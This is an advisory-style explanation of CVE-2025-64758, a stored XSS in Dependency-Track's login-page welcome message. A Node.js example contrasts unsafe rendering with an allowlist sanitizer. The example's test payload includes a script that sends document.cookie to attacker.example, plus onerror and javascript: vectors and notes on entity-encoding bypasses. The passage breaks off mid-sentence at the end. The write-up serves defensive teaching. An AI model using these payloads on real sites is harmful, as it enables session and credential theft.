Overview
CVE-2025-64758 is a medium-severity stored Cross-Site Scripting (XSS) vulnerability in the web frontend of Dependency-Track, the open-source Component Analysis platform. Versions of @dependencytrack/frontend prior to 4.13.6 are affected. A user holding the `SYSTEM_CONFIGURATION` permission (typically an administrator) can inject arbitrary JavaScript into the login page through the configurable welcome message, and that script then runs in the browser of anyone who loads the page.
Technical Details
Dependency-Track's frontend lets administrators configure a custom "welcome message" that is shown on the login page. The feature exists for branding, so it deliberately accepts HTML rather than plain text. Before 4.13.6, however, the frontend rendered that HTML without sanitizing it, so an account with the `SYSTEM_CONFIGURATION` permission could store markup carrying JavaScript as the welcome message. The login page is reachable without authentication, so the injected script executes in the browser of every visitor who loads it. Because it runs on the page where credentials are entered, it can capture usernames and passwords as they are typed, redirect users to a phishing page, or hijack the session of a user who is still logged in; in effect, one privileged account gains a persistent foothold against every other user of the instance. The requirement for an already privileged account limits the severity, but it also means the weakness turns a single compromised or malicious administrator into a threat to all other accounts. Operators who cannot upgrade immediately should review the currently configured welcome message for anything beyond plain formatting markup.
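As an added illustration, not code from Dependency-Track or from the original advisory, the following Node.js script contrasts the vulnerable pattern, rendering an administrator's stored welcome message as raw markup, with the class of fix the advisory describes: passing the message through an allowlist sanitizer so that branding markup survives but script elements, event-handler attributes and javascript: URLs do not. The tag and attribute policy, the function names, the login-page skeleton and the payload are all assumptions made for this example, not Dependency-Track's actual implementation; production code should rely on a maintained library such as DOMPurify rather than a hand-written sanitizer, which is shown here only to make the allowlist logic visible.

```javascript
// Added example, not Dependency-Track's code: the vulnerable "raw HTML" rendering of a
// stored welcome message beside an allowlist sanitizer. Policy and payload are assumptions.
const ALLOWED_TAGS = {                 // tags a branding banner needs -> attributes it may keep
  p: [], br: [], b: [], strong: [], i: [], em: [], u: [], ul: [], ol: [], li: [],
  h1: [], h2: [], h3: [], a: ['href', 'title'], img: ['src', 'alt', 'width', 'height'],
};
const URL_ATTRS = new Set(['href', 'src']);
const SAFE_URL = /^(?:https?:|mailto:|\/(?!\/)|\.\/|#)/i;   // javascript:/data: never match
const DROP_WITH_CONTENT = new Set(['script', 'style']);     // body is executable, drop it too
const TAG_RE = /^<(\/?)([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/;
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
const NAMED_ENTITIES = new Map([['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"]]);

// Decode numeric and basic named entities, so "&#106;avascript:" is judged as the browser sees it.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] !== '#') return NAMED_ENTITIES.get(body.toLowerCase()) ?? match;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Cleaned URL if its scheme is allowlisted, else null. Control chars and whitespace are
// stripped first so "java\tscript:" cannot split the scheme.
function safeUrl(value) {
  const cleaned = decodeEntities(value).replace(/[\u0000-\u0020\u007f]/g, '');
  return SAFE_URL.test(cleaned) ? cleaned : null;
}

function rebuildTag(name, rawAttrs) {
  let out = '<' + name;
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const attr = m[1].toLowerCase();
    if (!ALLOWED_TAGS[name].includes(attr)) continue;   // drops onerror=, onclick=, style=, ...
    let value = m[2] ?? m[3] ?? m[4] ?? '';
    if (URL_ATTRS.has(attr)) {
      value = safeUrl(value);
      if (value === null) continue;                     // drops javascript:/data: URLs
    } else {
      value = decodeEntities(value);
    }
    out += ` ${attr}="${escapeHtml(value)}"`;           // re-serialise with known quoting
  }
  return out + '>';
}

// Unknown tags are removed (their text is kept), script/style bodies and comments are
// removed, a stray "<" becomes text. Allowed tags are rebuilt from the policy above.
function sanitizeHtml(html) {
  let out = '', i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) { out += html.slice(i); break; }
    out += html.slice(i, lt);
    const rest = html.slice(lt);
    if (rest.startsWith('<!--')) {
      const end = rest.indexOf('-->');
      i = end === -1 ? html.length : lt + end + 3;
      continue;
    }
    const m = TAG_RE.exec(rest);
    if (!m) { out += '&lt;'; i = lt + 1; continue; }
    const [whole, closing, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    i = lt + whole.length;
    // hasOwnProperty rather than "in": "<constructor>" must not resolve via Object.prototype
    if (!Object.prototype.hasOwnProperty.call(ALLOWED_TAGS, name)) {
      if (!closing && DROP_WITH_CONTENT.has(name)) {
        const close = html.toLowerCase().indexOf(`</${name}`, i);
        if (close === -1) break;
        const gt = html.indexOf('>', close);
        i = gt === -1 ? html.length : gt + 1;
      }
      continue;
    }
    out += closing ? `</${name}>` : rebuildTag(name, rawAttrs);
  }
  return out;
}

const LOGIN_FORM = '<form id="login"><input name="username"><input name="password" type="password"></form>';
// Pre-4.13.6 pattern the advisory describes: the stored string becomes raw markup on the login page.
function renderLoginPageVulnerable(welcomeMessage) {
  return `<div id="welcome">${welcomeMessage}</div>${LOGIN_FORM}`;
}
// Hardened pattern: the branding feature survives, active content does not.
function renderLoginPageHardened(welcomeMessage) {
  return `<div id="welcome">${sanitizeHtml(welcomeMessage)}</div>${LOGIN_FORM}`;
}

// Constructed payload: legitimate branding mixed with vectors a SYSTEM_CONFIGURATION holder could store.
const CONSTRUCTED_PAYLOAD =
  '<h1>Welcome to <b>ACME</b> Dependency-Track</h1>' +
  '<IMG SRC="/logo.png" ONERROR=alert(document.cookie)>' +
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' +
  '<a href="javascript:alert(1)" title="Sign in">Sign in</a>' +
  '<a href="https://example.com/?a=1&amp;b=2">Docs</a>' +
  '<!-- hidden --><span onclick="alert(1)">click</span>';
```

Running `renderLoginPageVulnerable(CONSTRUCTED_PAYLOAD)` reproduces the advisory's condition: the `<script>` element, the `ONERROR` handler and the `javascript:` link all reach the login page verbatim. `renderLoginPageHardened` keeps the heading, bold text, image and the plain `https:` link while the script, the handler, the `javascript:` URL, the HTML comment and the unknown `<span>` are removed. Two details matter for anyone writing such a policy: URL attributes must be entity-decoded and stripped of control characters before the scheme check, or encodings such as `&#106;avascript:` and `java&#x09;script:` slip through, and tag lookups must use an own-property check so that names like `constructor` do not resolve through `Object.prototype`.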
The vulnerable code resides within the rendering process of the welcome message. By injecting specially crafted HTML that includes `